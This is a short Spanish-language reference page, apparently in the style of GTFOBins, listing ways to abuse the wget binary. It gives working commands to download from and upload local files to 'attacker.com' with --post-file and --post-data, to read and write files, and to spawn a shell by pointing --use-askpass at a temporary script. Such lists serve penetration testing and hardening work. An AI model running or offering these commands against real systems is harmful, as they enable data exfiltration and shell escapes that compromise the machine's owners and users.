./wget --examples
Funciones y ejemplos de uso
download
wget http://attacker.com/path/to/input-file -O /path/to/output-file
file-read
wget -i /path/to/input-file
file-write
wget -i /path/to/input-file -o /path/to/output-file
shell
echo -e '#!/bin/sh\n/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
wget --use-askpass=/path/to/temp-file 0
upload
wget --post-file=/path/to/input-file http://attacker.com
wget --post-data=DATA http://attacker.com
./related --binary=wget
Binarios relacionados
Comparten al menos una función con wget.